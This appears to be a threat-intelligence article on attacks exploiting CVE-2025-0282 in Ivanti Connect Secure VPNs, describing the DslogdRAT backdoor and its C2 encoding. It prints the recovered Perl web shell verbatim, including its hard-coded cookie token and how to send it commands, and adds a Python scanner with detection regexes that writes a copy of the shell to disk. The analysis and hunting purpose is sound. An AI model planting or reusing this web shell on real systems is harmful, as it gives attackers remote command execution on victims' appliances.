Recent attacks against Japanese organizations have been traced to exploitation of CVE-2025-0282, a vulnerability in Ivanti Connect Secure VPN appliances that was still a zero-day when the attacks began.
The attacks, observed around December 2024, used CVE-2025-0282 to deploy several malicious tools, including a custom backdoor named DslogdRAT and a purpose-built Perl web shell.
These tools allowed attackers to establish persistent access to compromised systems and execute arbitrary commands remotely.
The threat actors demonstrated advanced capabilities by chaining the zero-day exploit with custom malware deployment techniques.
After compromising the VPN appliances, attackers installed a Perl-based web shell that served as an initial foothold, enabling them to deploy additional malware components including DslogdRAT.
This multi-stage approach (exploit, web shell, then a second-stage implant) indicates deliberate planning rather than opportunistic exploitation of the appliances.
JPCERT analysts found that DslogdRAT contains a built-in evasion measure: it operates only between 8:00 AM and 8:00 PM, and sleeps outside that window.
Confining its activity to business hours lets the malware's traffic blend with legitimate user traffic on the VPN appliance, lowering the chance that an off-hours traffic spike or anomaly draws attention while the attackers keep their access.
The campaign appears to be related to activities attributed to a suspected China-nexus threat actor.
In addition to DslogdRAT, researchers also identified another malware variant called SPAWNSNARE on the same compromised systems, indicating a coordinated and well-resourced attack operation.
Both Google and CISA have previously reported on similar campaigns in April 2025, suggesting a continued effort targeting Ivanti products.
Security experts warn that these attacks represent an ongoing threat, with Ivanti Connect Secure products remaining a high-value target.
The vendor has recently addressed another critical vulnerability (CVE-2025-22457), but organizations are urged to maintain vigilance as attacks are expected to continue.
DslogdRAT Technical Analysis
DslogdRAT employs a sophisticated execution flow designed to evade detection mechanisms. Upon execution, the malware’s main process creates a child process before immediately terminating itself.
The first child process then decodes XOR-encrypted configuration data (using 0x63 as the key) and spawns a second child process containing the core functionality.
This process separation helps evade security tooling that tracks the behavior of a single process, as well as sandboxes or monitors that stop analysis once the initial process exits.
The attackers initially gained access through a deceptively simple yet effective Perl-based web shell deployed at “/home/webserver/htdocs/dana-na/cc/ccupdate.cgi”.
The web shell code (as recovered from the appliance; it is deliberately a backdoor, so the command execution is the intended behavior) reveals how attackers established their initial foothold:

    use CGI;
    # Read the raw Cookie header supplied by the HTTP client.
    my $cookie_str = $ENV{HTTP_COOKIE};
    # Gate on a DSAUTOKEN cookie whose value is a hard-coded secret;
    # requests without it receive no output, so casual scans see nothing.
    if ($cookie_str =~ /DSAUTOKEN=([^;]+)/) {
        if ($1 eq 'af95380019083db5') {
            print CGI::header( -type => 'text/html' );
            # The "data" request parameter is passed verbatim to the OS shell.
            my $data = CGI::param('data');
            system($data);
            exit(0);
        }
    }
This code lets attackers execute arbitrary commands on the appliance by sending an HTTP request that carries the cookie "DSAUTOKEN=af95380019083db5" and places the command to run in the "data" parameter; the output of the command is not returned in the response, so the operator relies on side effects (or on redirecting output into a web-accessible file) to see results.
The simplicity of this backdoor shows how little code is needed to create a durable foothold once an attacker can write a file into the web root of a network-edge appliance.
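A practitioner reviewing an appliance image will want to hunt for this pattern rather than for the one literal token. The following script, an added example that is not part of the JPCERT analysis or of the web shell itself, scans a directory tree of Perl CGI files and flags any file that combines two or more of the traits seen above (passing a request parameter to system(), gating on a cookie, and comparing against a hard-coded hex token). The indicator regexes, the two-hit threshold, and the sample files it writes to a temporary directory are all the editor's assumptions, constructed here so the example runs offline.

```python
import os
import re
import tempfile
from typing import Dict, List

# Heuristic indicators distilled from the ccupdate.cgi web shell.  The names
# and patterns are the editor's, not JPCERT's; tune them for your appliance.
INDICATORS = {
    # a request-controlled variable handed straight to a shell
    "shell_exec_of_variable": re.compile(r"\b(?:system|exec)\s*\(\s*\$\w+"),
    # script reads attacker-supplied request parameters
    "cgi_param_input": re.compile(r"CGI::param\s*\(|->param\s*\("),
    # access gated on the raw Cookie header
    "cookie_gate": re.compile(r"HTTP_COOKIE"),
    # equality test against a hard-coded hex token (8+ hex chars)
    "hardcoded_token": re.compile(r"\beq\s+['\"][0-9a-f]{8,}['\"]"),
}


def score_source(src: str) -> List[str]:
    """Return the names of every indicator that matches the given Perl source."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_dir(root: str, min_hits: int = 2) -> Dict[str, List[str]]:
    """Walk root and report CGI/Perl files with at least min_hits indicators.

    A single hit (for example, a legitimate script that reads a parameter) is
    not enough; the web shell above trips all four.
    """
    hits: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".cgi", ".pl", ".pm")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            found = score_source(src)
            if len(found) >= min_hits:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def demo_tree() -> str:
    """Create a constructed sample tree (not a real appliance image) and return its path."""
    root = tempfile.mkdtemp(prefix="ics-hunt-")
    samples = {
        # transcription of the backdoor described in the article
        "dana-na/cc/ccupdate.cgi": (
            "use CGI;\n"
            "my $cookie_str = $ENV{HTTP_COOKIE};\n"
            "if ($cookie_str =~ /DSAUTOKEN=([^;]+)/) {\n"
            "    if ($1 eq 'af95380019083db5') {\n"
            "        print CGI::header( -type => 'text/html' );\n"
            "        my $data = CGI::param('data');\n"
            "        system($data);\n"
            "        exit(0);\n"
            "    }\n"
            "}\n"
        ),
        # constructed benign script: reads a parameter but never executes it
        "dana-na/auth/welcome.cgi": (
            "use CGI;\n"
            "my $q = CGI->new;\n"
            "my $lang = $q->param('lang') || 'en';\n"
            "print $q->header(-type => 'text/html');\n"
            "print \"<html>lang=$lang</html>\\n\";\n"
        ),
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, found in scan_dir(demo_tree()).items():
        print(f"{path}: {', '.join(found)}")
```

Run it against a mounted copy of the appliance's web root (for Ivanti Connect Secure, the htdocs tree the article names) instead of demo_tree(); any file reported should be compared against a known-good image before it is treated as malicious, since the heuristics are intentionally broad.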
Communication between DslogdRAT and its command and control server (3.112.192.119:443) uses a custom encoding scheme rather than standard TLS-level protection alone.
The exchanged data is obfuscated with a simple XOR: the key bytes 0x01 through 0x07 are applied in sequence, so every 7-byte block of the stream is XORed with the same rotating key.
The scheme is weak, and trivially reversible once recognized, but it is enough to defeat signature matching on the cleartext commands. Over this channel the implant supports file upload and download, shell command execution, and proxying of traffic through the compromised appliance.